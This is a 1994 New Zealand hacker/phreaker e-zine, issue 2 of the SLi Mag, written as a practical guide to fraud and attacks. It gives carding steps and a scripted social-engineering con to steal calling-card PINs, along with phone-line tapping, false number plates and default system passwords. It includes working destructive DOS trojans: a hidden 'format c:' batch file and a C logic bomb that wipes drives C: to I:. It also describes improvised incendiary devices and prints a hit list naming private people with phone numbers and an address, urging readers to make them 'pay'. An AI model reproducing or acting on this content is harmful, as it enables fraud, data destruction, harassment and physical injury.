31/10/94 ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ WELCOME BACK EON ������ � � ����������������������������������������� Welcome to the second addition of the SLi Mag!!!!! We hope you liked the first one!!! I hope one year on, and one year wiser, we can give you even more info! Please if you feel like writting , donating or commenting about / for this mag send mail to the adress listed in the editors notes. DONATIONS would be VERY WELCOME as if i can get a reasonable ammount SLi BBS will go back up online. This mag prints to approx. 25 A4 pages - maybe 30 if your lucky.. If your having formatting problems go use a UNIX box to read this as thats what it was written on. OR use DOS EDIT command The amiga should have NO problems with formatting The RULEZ !! ~~~~~~~~~~~~ If you charge for this MAG you must send 25% of the profit you make to the adress listed in the editors notes. You may not edit this mag and a max of 2 hard copies may be produced. INDEX The Scene A Profile ..................... Cyntaxera/Eon Exchangez ............................... Eon Credit Cards ............................ Eon Credit Cards II ......................... Cyntaxera Trashing ................................ Eon Car Phreaking ........................... Thorium [In]Famous Quotes ....................... Digital Omega & Cyntaxera Phreaking ............................... Eon NZ Calling Cards ........................ Eon/Cyntaxera Simple Trojans .......................... Negative pH Passwds ................................. Eon Smyte (Hit) List ........................ SLi R.P.F.S.C (etc..) ....................... Eon Fake Platez ............................. Thorium VMB's ................................... Eon Books 2 Read ............................ Eon Aunty Cyntax'Z Nutty Notez .............. Cyntaxera 111 Numbers ............................. *UNKNOWN* Sweet Powder............................. Thorium Hacking ................................. Eon Redox Bomb .............................. Thorium Editors notez ........................... Eon ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ The Scene A Profile Eon & ������ � CyntaxEra � ����������������������������������������� The Major Groups in the Computer Underground Scene: =================================================== The HACKER: A person, male or female, who is interested in computer security. The majority of these people are not the misguided souls that the media depict them as, infact most are very friendly and extremly intelligent. Although their interests in security are quazi- legal there intention on the whole are pretty good. PROFILE: Average Age: 16 - 21 Physical Description: Normally pale skinned, caucasion with unkept hair. Clothes: Dark - black or alternative Average IQ: 100 - 145 (depending on age) Attitude to life: Carefree, dont mind drugs, are heavy civil liberatins. Jobs, hobbies etc.: Spends most time using computers or in dark rooms, away from light, reading SCI-FI novels. Books: If it has got a cover, they will read it but, like SCI-FI and mythical books. Electronic "ZINES" like Phrack, PHUN, Infotech, ATI, all produced by the hackers and phreakers themselves, and a whole lot more. This is but a small sample of the many magazines available to the public. At the end of this written project, you will be able to get a taste of a rather new, but high value magazine produced by some local (local, as being within New Zealand) hackers and phreakers which form SLi (Southern Lights inc.) - from which the "chairperson" just happens to be a good friend of mine. Music: From metal to opera. It's that diverse. Eating Habits: Jolt Cola - Drink Pizza - Food (obviously) Chinese -Food Hash Cookies - Food Cookies - Food Coffee - Drink Sleeping Habits: A good example would be from R-A-D (a fellow hacker and phreaker on the scene which runs SLi). "Sleep?? What the fuck is that?" Between 3 and 5 hours a night. The PHREAKER: A person, male or female, who is intrested in telecomunications and is sometimes forced to fraudulantly uses the telephone system to talk to other phreakers. These people are slightly nastier than hackers and to have one who dislikes you can be a big pain, and highly costly. Physical Description: White Pasty coloured skin, oily hair, rings around eyes (obviously from either chatting on illegally produced conferences or just to the one or two people or by producing these calls) and normally the significant darkly coloured clothing (either black, or colours to blend into the environment in which the phreak happens to be in at the particular time a phreak is about to make a "telephone call"). Average Age: 14..15 - 17..18 Attitude to Life: Easy going, free-loader with a bit of a cocky attitude. Still, a nice person if you get to know them. Don't mind using drugs (or maybe that should be "prefers to..."?) Jobs Hobbies etc.: Anything. Normally computer or communications, though. Music: Anything (well, pretty much anything...) Books: Refer to "The HACKER". Eating Habits: Same as a hacker although more likely to invole a bit more cola.. (CAFFIENE!!! (This is used during a phreaker or a hacker's three day marathons on the telephone, or computer)) Sleeping Habits: About 2 - 3 hours on average The Less Common Groups in the Computer Underground Scene ======================================================== The PIRATE: (or WAREZ PUPPY as they are known on the Internet by the other members of the Computer Underground) A male or female (considered as "kids" by the same group refered to above) who likes games.. They are not liked by most hackers or phreakers, waste anything they are given to get games and basically abuse the PHREAKERS and HACKERS. The "TRY-HARDS": People who just never made it in the underground. Those who want to be in the "in crowd", but are just abused because they are considered to be "lame". The "NEWBIES": Newcomers to the computer undergroud scene which are normally treated with suspicion and distrust. It takes approxomatly two to three weeks to even get spoken to - depending upon the people you know, of course. The "OLD-SCHOOL": People who have been in the scene for over two years. A good example would be Visionary, located in the United States. He is looked upon by most as being a mentor and teacher. The NARK: The most hated and despised member of the underground. These can include any of the above catorgories and are the ones who cause a large amount of trouble. They are the ones who tend to nark to the Police, FBI, CIA, Secret Service (USSS), Bell, MCI, TELECOM and all the other mega-companies in which the hackers and phreakers use to continue the undergrounds influence. ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ Exhanges! EON ������ � � ����������������������������������������� A List of Wgtn Telephone Switches Name Exc Abrev Number BELMONT BMT +64-4-565-0100 COURTNEY PLACE CPC +64-4-801-5676 EASTBOURNE EE +64-4-562-8100 HATAITAI HTI +64-4-386-1200 ISLAND BAY IBY +64-4-383-8100 JOHNSONVILLE JV +64-4-478-3000 KARORI KRI +64-4-476-6100 KELBURN KLB +64-4-475-8100 KHANDALLAH KNH +64-4-479-7979 KILBIRNIE KIL +64-4-387-2020 LOWER HUTT LHT +64-4-566-8808 MIRAMAR MIR +64-4-388-1100 NAENAE NAE +64-4-567-7100 PAEKAKARIKI PAE +64-4-292-8100 PARAPARAUMU PRM +64-4-298-5100 PETONE PTN +64-4-568-8100 PLIMMERTON PLM +64-4-233-8100 PORIRUA PRO +64-4-237-8100 PUKERUA BAY PKB +64-4-239-9100 STOKES VALLEY SV +64-4-563-8100 TAWA TWA +64-4-232-8100 TITAHI BAY TIB +64-4-528-9100 UPPER HUTT NORTH UPN +64-4-526-9100 UPPER HUTT UP +64-4-528-9100 WAIKANAE WAE +64-4-293-6100 WAINUIOMATA WOA +64-4-564-8100 WAITANGIRUA WTN +64-4-235-9100 WELLINGTON CENTRAL WN +64-4-472-9100 WELLINGTON SOUTH WTH +64-4-389-4999 WHITBY WTB +64-4-234-8100 There we go. The list of Wellington exchanges. Addresses may be forth coming if we can get them. ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ Credit Cards Eon ������ � � ����������������������������������������� Well.. humm.. fuck!!! Okay, umm, CREDIT CARDS!! A credit card. I bet your money *grin*, someone in your house has a CC. Well, ya know, to get a free phone call with it, all ya need is the number and expiry date. However, the expiry date in New Zealand can be made up, as Telecom don't check the actual account - just if the card is valid! This means you ask... Well, you get a program like checksum (for those of you who don't know, it's a credit card generator), and bingo! FREE KALLS anywhere, anytime, ALWAYS!! Carding Stuff ------------- 1) Find a "drop site" <--- some place to get the stuff u "buy" sent to 2) Get some cards <--- trash some place like Pizza Hut, a restaraunt or DSE (DSE: Dick Smith Electronics) 3) Get some mail-order catalogs 4) Use your common sense and card some stuff!!! :) Easy, huh!?!?! ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ Credit Cards II Cyntaxera ������ � � ����������������������������������������� Some stories which you may give you a laugh, or just ammuse you.... [hopefully.. =) ] Names have been changed - perhaps it's obvious, but I'm sure you've met Bob, Fran, Stan and Fred before.. seee.. they're waving on the other side of the room. No, they're not imaginary.. you just can't see them. *manic laughter* *grin* - to protect the innocent.. ;) Dontcha just hate it when things like this happens... 1) Whilst in the middle of signing for a pizza, you forget your last name (but you sign and remember your initial - I guess that's some sort of a consolation.. ;) ), and you have to make some excuse why you have to leave in the middle of signing your sig. Pizza Man: "Here's ya pizza, Miss." Bob [You]: "Gee, uh, thanks.." Pizza Man: "Okay, just sign here." [He points to the X where you're s'posed to sign and hands you a red ball-point pen] Bob: "Sure, not a prob." [You grab the pen and begin to sign this dastardly signature while the guy who was s'posed to be with you at the time had pissed off. You figure that he's gone to the bottom of the steps that you were standing at the top of and you finished signing your initial (Okay, so you forget your last name.. like it really matters... *grin*).] "Uh, hang on a mo." [You run down, away from the pizza man, and down the steps to find "Chris"] "Hey, uh, Chris!" "Chris": "Yeah, what?" Bob: "Help me with these pizzas!" [You remember your last name, and get back up the stairs to sign the account slip] "Sorry, just had to figure out whether he'd gone inside and forgot to help me to bring the pizzas in." [You flash a friendly smile - it's harder for some guy to accuse a person (oh, and it helps being female.. *wink*) of having a fake credit card when the person seems friendly enough.. *grin*] Pizza Man: "Sure, not a problem. We're used to that sorta thing" (Yeah, I bet he is! ;) ) [Finally, "Chris" gets up the stairs to help you carry the pizzas a couple of blocks away so you can "pig-out" at Stan's house nearby.] Bob: "Thanks. It's nice to have a person who understands the situation some of us are in at the moment." [You wanna laugh, but realise that that would be nasty and totally uncalled for.. oh, and it would get him slightly suspicious.] "Chris": "Sorry, just had to go inside for moment" Bob: "Yeah, I thought you weren't gonna come back and help!" [You smile] Pizza Man: "Okay, well, I'd better be back soon, so I guess I'm outtah here." "Chris" & Bob: "Okay, see ya, and have a nice night." [He drives off and "Chris" and you carry the pizzas off to party on down at Stan's.] 2) What about when the Pizza Man forgets some of your order and asks you to come with him back to the Pizza Parlour to pick up the rest of your order... You'll have to trust your instincts and go with what you think is going on. Either, a) he and/or the company know and are tryin' to get you back to the Pizza place to get you busted (perhaps the Police Station) or b) he really did forget the stuff. If you choose to get in the car and drive off with the guy, just keep a couple of things in mind. You have a real advantage if you are the opposite sex to the pizza person (can't be sexist now, can we?!? ;) ).. If that's the case, one word.... FLIRT! It's harder for someone to nark on you if they have a serious crush on ya! *grin* Just don't over do it and lead them on too far - they may want to see you again, and if you ARE found out, he/she is not going to forget what you look like in a hurry! =) Of course, if you're the same sex, I'd advise NOT to get in the car, but to stay back and make some excuse up (eg. "I've got a kid sit- tin' upstairs in a high-chair with a bowl of porrige and I don't want the room gettin' a mess - the kid would most probably end up throwing it all over the room to make as much mess as possible." (oh, and don't forget the ole friendly smile.. *grin*) One thing though, if you come up with a lousy excuse, they'll get a bit suspicious, so don't use some stupid excuse like, "Uh, the, uh, dog was in the, uh, middle of, uh, getting it's morning walk?" .. And saying your excuse with the least amount of "umm's" and "uh's" would be best. Just pretend that you're explaining to one of your teachers about leaving your homework at home.. =) ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ Trashing EON ������ � � ����������������������������������������� Trashing ~~~~~~~~ Don't ya just hate cops?!! Well, heres a little bit of fun! Me, the editor, and a friend went trashing one night. We got all the stuff we wanted - including the ADDRESS of EVERY exchange (switch) in Wellington - and we were just tidying up when a sekurity car stopped we ran!!! But our bikez (yeah i know well lets say a car was out of the question we left anyway the sekurity guy left BUT he had called the cops. So after going trashing at the next location on our way HOME the pigs stop us !!! anyway i split Me mate splits in the other direction and the cop car chases ME! Well, and another cop (who got out of the car) chased my mate. Anyway, the cops siren ther siren and ask me to "pull over" whats a guy to do when your on a bike and a cops chasing you in a v8 ?? well we stop and get this Cop: What's in the bag? Me: Papers. Cop: Can I look? Me: You can't do that. Cop: You better let me. Unless you want to spend all night out here talking to us. Me: Okay, man. Look for y'self. [Now that was what u call pigs being FUCKERS!!!!!!! Anyway, I get hasselled and shit. Once in the interigation room, my mate got a coffee i got NOTHING] [after I've been acting like a elite hacker dude] Cop: You have a problem with us?? Me: No, I have no problem with the police. [In other words, just with him] [Anyway, they couldn't charge us with anything!!! But they were going to try, "Possesion of a tool that could be used in a burglary". Get this:] Cop: Why have you got a hammer in your bag??? Me: Err, to open the rubish bags!? :) Cop: Why not take a knife?? Me: A knife? Cause its illegal to carry a knife! :) Well, anyway, remember: Trashing is okay, but cops are LAMERS!! Well, actually some/most cops are okay. Infact they're cool but SOME... SOME.. are just born WANKERS and make people think all cops are just the same as them.. But, hey, POWER TO THE PEOPLE.. ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ Car Phreaking Thorium ������ � � ����������������������������������������� Through personal experience I have found that it is most rewarding to phreak with a Laptop. Unfortunately it is a little suspicious to be seen sitting on a fence with a laptop, and also a little hard to escape... So, use a CAR! Just find a nice "Ordinary" car, like two years ago's model of a common jap import... Just so that noone can describe it anything other than "A Jap Car" or similar. Out of your local circle of Phriends at least one will have access to this mode of transport. Next, spend a day making 2 phreaking cords, attach both to Telecom (Trade Mark!) phone jacks inside the car, usually under the dashboard so as not to be too suspicous, and connect the two sets of two wires onto nails thru the floor at the passengers feet. These can then be accessed by alligator clips from outside the car, and is low to the ground so that the cords will not be seen. Connect up in the "Usual" way (Those grey pylons are best. Just find a nice quiet road...) and you're away. Connect the modem in the laptop (Or another one if no built in modem) to one jack, and call all those international BBS's. Use the other phone for voice phreaks, as the long D/L times can get boring, so do things like pissing off the operator etc... IMPORTANT! If you see anyone walking along YOUR side of the street (They won't see the cords on the other side), a telecom van, or any old ladies, just casually drive off. Because you will have attached the wires to the nails tighter than the aligator clips to the phone lines, you will just drag the wires behind you... PS - It's a good idea to go in three's, one driver (ALWAYS READY TO DRIVE) and two phreaks. It's best if you have a mix of genders, cos then if you're caught not too many questions will be asked as to why you're "Parked" there, coz what will you be doing. ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ [In]Famous Quotes Digital Omega & ������ � Cyntaxera � ����������������������������������������� A small quote from the SLi team: [Digital Omega and Eon] D/O: 'Yo Eon, it says in this hack article that there's less hacking per person in NZ 'cos "the people in New Zealand are more outdoor oriented". Eon: 'Huh? , Where? ' ---------- Misc Quotes from lots of places ---------- --- 'Truth is cheap, but information costs' --- --- 'Information is power' --- --- 'Information is power - power is 0's and 1's' --- --- 'Power is in numbers - our only hope for survival is unity' --- --- 'If one of our bretheren fall, they shall be martyred, not made a fool' --- --- 'If you fall alone, there will always be others to catch you' --- --- 'The biggest lie is "Information wants to be free": it begs to be hoarded, stored, hidden away from the world. Information is a recluse which you pay to bring into the open.' --- --- 'Hacking is, in its purest form, exploring.' --- --- 'I feel sticky' --- --- 'I have no friends male or female' --- --- 'Someone's been shmoking in here' --- ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ Phreakin Eon ������ � � ����������������������������������������� Umm, yeah, got any important calls to make, but don't want the phone bill? Try going into an office building and into one of the lifts, now this can be done almost anwhere there is a lift. Get into the lift and open the emergency telephone box and bingo! there you go, a nice fone line at your disposal, pray it isn't leased line or otherwise directly linked with the emergency services or secretary of the building, and get out your DTMF dialer (only needed if the phone has security like only 1 or 2 buttons with call the emergency operator or a secretary etc) and dial your destination - watch for people getting onto the lift. Put an "OUT OF ORDER" sign on it and/or press the emergency stop button until you have finished the call. The same idea can be used in places like pubs etc that have taxi phones that have a special phone with only the buttons needed to call the taxi firm etc. I havent tried this one but im sure something would work. Also there are COCOT'S. These are customer-owned-coin-operated-telephone these are rented by telecom and are usually brown and white, white, yellow etc in colour, can be reconised by the fact that they are usually more expensive than normal phones, and they will need the coin to be dropped in BEFORE the number is dialled. What happens is that untill the right amount of cash is inserted they disconnect the keypad. To get around this, just use your DTMF dialer insted of the keypad (a DTMF dialer, or Pocket DIaler, sends DTMF tones down the line to simulate the numbers on the keypad, you can buy these at most electronic stores) and bingo! you've got a free call! ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ NZ Calling-Cards EON/CyntaxEra ������ � � ����������������������������������������� A New Zealand calling card is a pice of plastic that allows you to call anywhere in New Zealand and it also allows you to call ANYWHERE from New Zealand! ie. If you are in New Zealand, you can call the USA, UK, ... ANYWHERE. Obviously, this has some real power when ya think of what you can do. No more out in the bushes tapping lines! Now you're in a fone box, warm and drinking a can of Coke and talking to some guy in the USA. Now the question......... HOW DO I GET SOME CARDS!!! ~~~~~~~~~~~~~~~~~~~~~~~~~~ Ok, well, social engineering works... ie. "Hello. This is Chris Jones of Telecom, calling card division." "Oh, hello. What's the matter?" "Well, we're just calling to confirm your $600 call to the US." "Huh? What?" "It's standard proceedure to call a customer after $500 worth of bills." "But I haven't made any calls!" "Really?" "Damn straight." "Humm, what's your calling card number?" "It's XXXX-XXXX-XXXX-XXXX." "Well, you have a $600 charge on your bill. Have you given your pin out?" "No! Of course not!" "Well, I can change it for you if you want." "Ok, but how about the bill?" "I'll remove it for you. Okay, to change your pin number, I need the existing pin number." "Well, I dunno.. Ummm.. How can you prove you're Telecom?" "Call me on", edit a VMB and give them the number, "." "Oh, okay. Nevermind. Ummm, here's my pin. 1234." "Thank you. I'll change it to 5643" "Okay, thank you." "Okay. Bye. Oh, and sir, the pin will be changed at 2pm." Well, that's it and it works Sadly, people are that LAME!!! ^"." <--- if i was ment to spell god would ave put a dictionary next to my computer :) Oh, BTW: the way to use a NZCC in NZ is: "012-NUMBER-TO-CALL PAUSE CARD-NUMBER-#-PIN-#" But, if you can't figure that out, then just listen to the voice prompts which will be given to you after dialing '012'. Otherwise if out of NZ dial your local NZ direct # instead of 012. ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ Simple Trojans Negative pH ������ � � ����������������������������������������� Only applicable to DOS or OS/2: Trojens are easy to write, and surprisingly effective. But they have their downturns. For example, you seldom test a trojen before releasing it. This has led to a major problem in trojens, even in the previous issue of this SLi magazine, the fact that DOS asks you for a volume label! Therefore, the "@Echo Off Echo y | Format c:" recomended in the previous issue of SLi magazine has a major bug in it. It will not return control to the invoking program. This is a slightly more advanced piece of batch code that I prefer. It does, however, require DOS 5 or better. @echo off /* Turns off command display */ ctty nul /* All input and output now go's to the NULL device. No ^C possible.) */ echo y|format c: /v:Supernova /q /u /* 'echo y' sends a 'y' character, which is redirected by the pipe into the following program, and is interpreted as standard input. 'format c:' formats c:, surprisingly enough, and '/v:Supernova' is the volume label. For a format to destroy anything is DOS 5 or above, '/u' is nessesary, and the '/q' simply reduces the time needed to about 6 seconds. */ ctty con /* Give back keyboard input, display output */ echo Trojen (TM) Copyright 1994. /* Just a gloating message */ You can also have somewhat more advanced trojens, only a few steps away from a virus. Here is one example that I wrote, that consists of three files, and is designed as a 'logic bomb'. First file: DOSKEY.COM In a file called DOSKEY.BAT, put the following. @echo off graftabl.exe graftabl.com Complie this file using BAT2EXEC, a free utility which you can FTP. You will then have DOSKEY.COM, which can be copyed over the original file. Second file: GRAFTABL.COM Merely the original DOSKEY.COM under another name :) So copy it. Third file, GRAFTABL.EXE This is a C file, which cannot be written in .BAT language without extensive utilitys. Here is the source: #include #include #include int main(void) { struct date d; getdate(&d); if (d.da_day == 5) { system("CTTY NUL"); system("ECHO Y|FORMAT I: /V:Supernova! /Q /U"); system("ECHO Y|FORMAT H: /V:Supernova! /Q /U"); system("ECHO Y|FORMAT G: /V:Supernova! /Q /U"); system("ECHO Y|FORMAT F: /V:Supernova! /Q /U"); system("ECHO Y|FORMAT E: /V:Supernova! /Q /U"); system("ECHO Y|FORMAT D: /V:Supernova! /Q /U"); system("ECHO Y|FORMAT C: /V:Supernova! /Q /U"); } return 0; } Notes: For backwards destructive compatability, you need to omit the /Q and /U switches, as these were only introduced in DOS 5. The C source was written using Borland C++, so the d.da_day structure may vary slightly. If required, the return code could be anything you choose. [EDITORS NOTE: On later vers of DOS the flag /autotest can be used to Replace the "echo y| format" bits ] ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ Passwds Eon ������ � � ����������������������������������������� Yo ! this is a list of common passwds/accountz for diffrent systems. [username -- passwd, passwd, etc...] Unix: root -- admin, administration test -- test, systemtest, tester new -- new, newuser, login guest,visitor -- guest, null , guestuser, visitor demo -- demo, null , guest, visitor VMS: default -- default, usr demo -- feild, $ervice, test, digital, service sysmaint -- sysmaint, service, digital systest -- systest system -- system, manager, operator, syslib Sys75: browse -- looker, lookerpw maint -- rwmaint locate -- locatepw rcust -- rcustpw tech -- feild cust -- cust Of course, this is a REAL quick list written at the last minute, so well.. you know the drill :) Humm, hey, thats what happens when you get bored... ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ Smyte List Southern Lights inc. ������ � � ����������������������������������������� Here is a list of people who have fucked off SLi. We want our readers to help pay back those who think playing with SLi is a game. They are all lamers and they all need to PAY. Note its from the most hienious crime to the lamest. The address is there for special interest groups to note down. ---------------+------------------------+--------------------------------- Name | Number/Address | Reason ---------------+------------------------+--------------------------------- Chris Jones +64-4-562-7620 Edited SLi Mag 1 and said HE wrote it !! Mark Janssen 74 Tapwhai st Gay paedeophile who raped a Stokes Valley guy who is a friend of a few Wellington,NZ SLi members. Tim Taylor +64-4-567-7932 Asshole who killed an SLi Sys. Russel Dench +64-4-233-8713 NARKED on SLi Members ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ R.P.F.S.C (etc..) EON ������ � � ����������������������������������������� R.P.F.S.C - Rocket Propelled Fly Spray Cans Ok, heres a few little anarchy tricks that you should be able to carry out in your own home without to much trouble: Things you need: ================ Steel Pipe - (Just big enough to fit fly-spray-can inside, leave 10mm gap between can and pipe) Second Steel Pipe - (This is the exhaust so the bigger the better though it must be bigger than the first pipe - experiment) Firestarters - (Those flammable blocks used for starting camp fires) Fly-Spray-Can - (FULL) How-2: ====== Dig a hole in a secure area (in otherwords no where near anything of any value!!!), deep enough to fit one and a half fly-spray-cans. Shove the pipe in the hole at a 45' angle (prefferable) ah fuck it look folow the diagram delow !!! can goes down here nosel first (2) / / lit fire starters down here (1) pipe--- \ \ / ----- \ \--| |---- ###### \ \#| | ---- exhaust ####### \ \| |#### ######## \ |#### # = Ground Get the pic ?? GOOD !!! Fun With Super-Glue ~~~~~~~~~~~~~~~~~~~ 1 - Take one container of super-glue, superglue the toilet paper tube to the dispenser (thing that holds the cardboard tube :) 2 - Super-glue the toilet seat down. 3 - Super-Glue your teacher or lecturers diary to the table :) 4 - Super-Glue your entire P.E. classes shoes to the floor :) 5 - Super-glue someone you dont likes car/home lock >:-) You get the picture, there are thousands of possibilities... Baked Bean Bomb ~~~~~~~~~~~~~~~ Ok this ones pretty shitty, but its fun at some sort of camp or something You Need ======== 1 baked bean can :) (unopened) 3or4 Firestarters What to do ========== Just find a clear spot (away from people/houses etc!!) and light the firestarters then put the can upright on top of them stand back at a SAFE distance (further the better!!), and watch the baked beans fly! :) ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ Fake Platez Thorium ������ � � ����������������������������������������� Flase plates are essential for any form of car-oriented quasi-legal enterprise, eg Phreaking with a computer, or burglary... For the above system, you may wish to make some plates to help disguise your car - REMEMBER!! Phreaking is LESS of an offence than falsifying plates (In N.Z.), and so this is NOT a good idea for plain ofl phreaking. If, however, you are wishing to, say, plant Bombs in someone's house (Only SAMLL ones, such as the "Redoxon Bomb"), then these may be necessary. First, decide how good they need to be - the more real the better, but real ones are harder to make. For a spur of the moment job, just find someone's car and taking a large pencil (HB is good) and a piece of paper, rub the plates onto the paper. This is done by placing the paper over the plates, then rubbing the pencil over the letters and numbers. This leaves a darker outline where the letters and numbers were, coz they stick out from the metal. Trace this ont fresh paper, and you're away... The next two ways are a little more complex: First you have to find a good supply of number plates - a car wreckers usually has some left on the cars. I have a car wreckers over from where I work, so one night I decided to do this... Take off the number plates - usually fasened with a small bolt in each corner. You only need one from each car, but as larger selection as possible. Take these plates and PHOTOCOPY them. Because they are either balck on white, or white on black, use the inverse function on most better photocopyers to make them all one type. Then cut out the letters and make new plates. You can now return the old plates, after sketching them out for physical layout. Now using your cut out letters and numbers, make the desired plate - My one is "RS 232" - Hehehe... Now paste these onto the physical layout, and you have a plate. For added security, make sure you use the right age of color, ie for standard plates prior to the 'Mx xxxx' series you have to make them white letters and numbers on black backgrounds. After M is black letters and numbers on white background. Personalised plates are all black letters and numbers on white background. Some suggested plates: RS 232 (My one, perfect for Phreaking etc...) PHREAK, FUKOFF, PHUCKU, FUCKU2, PISOFF IWANTU, FUKWIT, WANKER, TOSSER, BIGNOB 6ULDV8 (Sexual Deviate!) Now just stick them over your plates. Make sure that 'Normal' plates, such as 'JM 6316' fit the model of car you are using... Remeber that these need not be for YOUR car - put them over someone else's plates! The second awyis to make a perfect copy of a set of plates - NOTE - I have not done this, but it SHOULD work. First, nick only 1 plate, using the same method as above to obtain it. Now make a clay or sand mold of this plate, and cast lead into it. This would give you metal plates which you can paint and would look 100% perfect, but if you are caught with them you could be up for SERIOUS SHIT. Paper stick on ones are bad enough... ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ VMB's Eon ������ � � ����������������������������������������� This is an indepth guide to Hacking VMB's or Voice mail Boxes/Systems. [not] What are VMB's? =============== A VMB - Voice Mail Box is basicly a answer machine, however it is designed on the idea of a multi user base. ie every user on the VMB has a seperate mail box and passcode between 2 and 32 characters - depending upon the system type. Most big corps. and govt. deps. have them. How to use them... Keys that are useful: # = Upon entering the VMB system, press this key. You will be prompted for a mail box, normally 4 digits long. If the mbox exists, you are prompted for a passcode. Some defaults are: 9997 997 7779 779 1111 911 9111 1010 1423 9009 1199 5555 0666 0999 9000 1234 4321. * = This key is used in many ways. Normaly the "special" key it is used to hang up, cancel a command, return from a menu or other things like that. Uses of a VMB: Well, other than the obvious anonaminity it gives you, you can use it to: trade info, card stuff, bluff operators into 3rd party billing. A whole range of diffrent things. For example lets say you want to card something .. well you normally need to give a contact number so: rig a VMB's prompts to say "Hi this is im not in at the momnet but if you want to leave me a msg please do so" This is usually enuff to convince a credit checker its you. To find VMB's, try your yellow(or white) pages under: Laboratories Computers Govt Deps. Schools (institute of higher learning) Medical Centres The NZQA (New Zealand Qualifications Authority) (try 802-3000) Even some plumbers have them, you should find about 1 VMB every 5 or so places you ring, BTW dont ring before 5:30 on weekdays, unless you want to tone your social engineerings skills! :-) Ok, because most VMB's look sound exactly like answering machines, the easiest way to distinguish them is bye hitting either #, * or sometimes 1, if its a VMB it will respond with somethig. ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ Bookz 2 Read EON ������ � � ����������������������������������������� yeah umm books to read TBBOM !!! anything by GREG BEAR anything by TIMOTHY ZAHN anything with the word HACKER in it 2600 - It's kinda stale readin', but good for the beginner H/P'er - Sorry you guys at 2600! ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ Aunty Cyntax's Nutty Cyntaxera ������ � Notes � ����������������������������������������� Okay, so I basically begged for this column, but well, WAW... (Women Always Win *grin*) ... only kiddin'.. well, maybe a little - the bit about me beggin' for the column.. *wink* Well, it's been a little while since this mag's been back in action, but we'll we're all back and it's been an entire year since you've all seen the name of SLi in the magazine world recently. Didn't quite realise it, but we just figured out t'day that the day the SLi mag was released, was October the 31st, otherwise known as HALLOWEEN. We thought that it would be appropriate to release it the same day just to be, uh, eleet k-rad hacker dudes... *grin* Nah, seriously, seeming that it had been an entire year since the last issue was released, we thought we'd release this one at the same time just for the hell of it.. ;) Anyway, I thought I'd say a big 'hi' out to all you lot out there to a) be nice and friendly *grin* and b) check if you're all still livin' and haven't been busted or tracked down and "taken" by the ss, cops and/or military (note the lack of capitals... they don't deserve 'em.. ;) )... Greets go out to... *ahem* Juliet (SoP! ;) ), LadyAda, Leigh, Shatter, Slacker, BooYaa, Utah Saint, Freiheit, Noise, Zaphod, SCoJaCK, Motley, Eck, Snidely, DrMenace, Quattro, Mindscrew, Pyr0t3ch, Lestat, T00ph, Elastic, Radikahl, D-FENS, Hypnosis, MrPurple (or CSativa or whatever name you're known by now *grin* ), Baccahbar, DTangent, hotrod, Solctice, Zibby (where the hell are you?! =) ), Speed_Rcr, GAnarchy, PurpCon, UNiQUe (What's your new info? Did you get taken by aliens or summink? ;) ), ChezeHead, Niaht, GreYLocK, Neophyte, Paradox, Gen-X, SSerpent, Serpent, Tega, Grasshopr, Schizo, Thorium, Smrf.. That's the list of ppl I've got info for, so if I've missed ya off the list, then gimme y'info! *grin* ;) Soooo, any gossip, just e-mail me - TELCO_T@ix.wcc.govt.nz - and I'll tell everyone readin' about it.. or, well, if you attatch summink like: "---- Don't print this bit" etc.. then I'll make sure that it isn't printed.. =) .. you can trust me.. *smirk* Nah, really.. "I won't tell" -- quote from "Freddy's Dead". *evil laughter* 'Till the next issue (hopefully sooooooooon.. =) ).. Aunty CyntaxEra. ;) ��������������������������������������������������� � Southern Lights Incorporated Mag ISSUE 2 � � � ������ 111 Numbers *UNKNOWN* ������ � � ����������������������������������������� The following is a list of 111 (THE NZ EMERGENCY NUMBER) Cellular Accept- ance Points. This means, when you call these numbers, you are really cal- ling 111. Have fun! Oh, PS: The '010' operators don't know it's a 111 backdoor so try calling them COLLECT, or maybe try 3rd party billing. Whatever you do, have fun and watch out. I expect these numbers MAY have ANI, but it's still a 50:50 chance. Oh, you dont need to call them with a cell fone. NB: I expect these numbers to change VERY fast. ------------->8--------------------------------------------------------- Fire | Pol | Amb | Loc | # -------+-------------+-----------+--------------+---------------------- Auck Auck Auck Auck 07-832-5000 Whan Whan Whan Whan ""-"""-5100 ""-"""-5200 Hami Hami Auck Coro ""-"""-5300 ""-"""-5400 ""-"""-5500 ""-"""-5600 ""-"""-5700 ""-"""-5800 ""-"""-5990 Hami Hami Hami Hami ""-"""-6000 ""-"""-6100 ""-"""-6200 Hami Roto Hami Roto ""-"""-6300 Hami Wang Wang Taum ""-"""-6400 """" Taup Hami Taup ""-"""-6500 """" Taur """" Taur ""-"""-6600 """" Toko """" Toko ""-"""-6700 """" Taur Whak Whak ""-"""-6800 ""-"""-6900 PMnt PMnt PMnt PMnt ""-"""-7000 ""-"""-7100 PMnt Gisb Gisb Gisb ""-"""-7200 """" Levi Levi Levi ""-"""-7300 Wgtn Mast Mast Mast ""-"""-7400 Napi Napi Napi Napi ""-"""-7500 """" Gisb TPSp Ruat ""-"""-7600 Wang Wang Wang Taih ""-"""-7700 """" """" """" Wang ""-"""-7800 NewP NewP NewP NewP ""-"""-7900 Wgtn Wgtn Wgtn Wgtn ""-"""-8000 Wang Wang PMnt Mart ""-"""-8100 ""-"""-8200 ""-"""-8300 ""-"""-8400 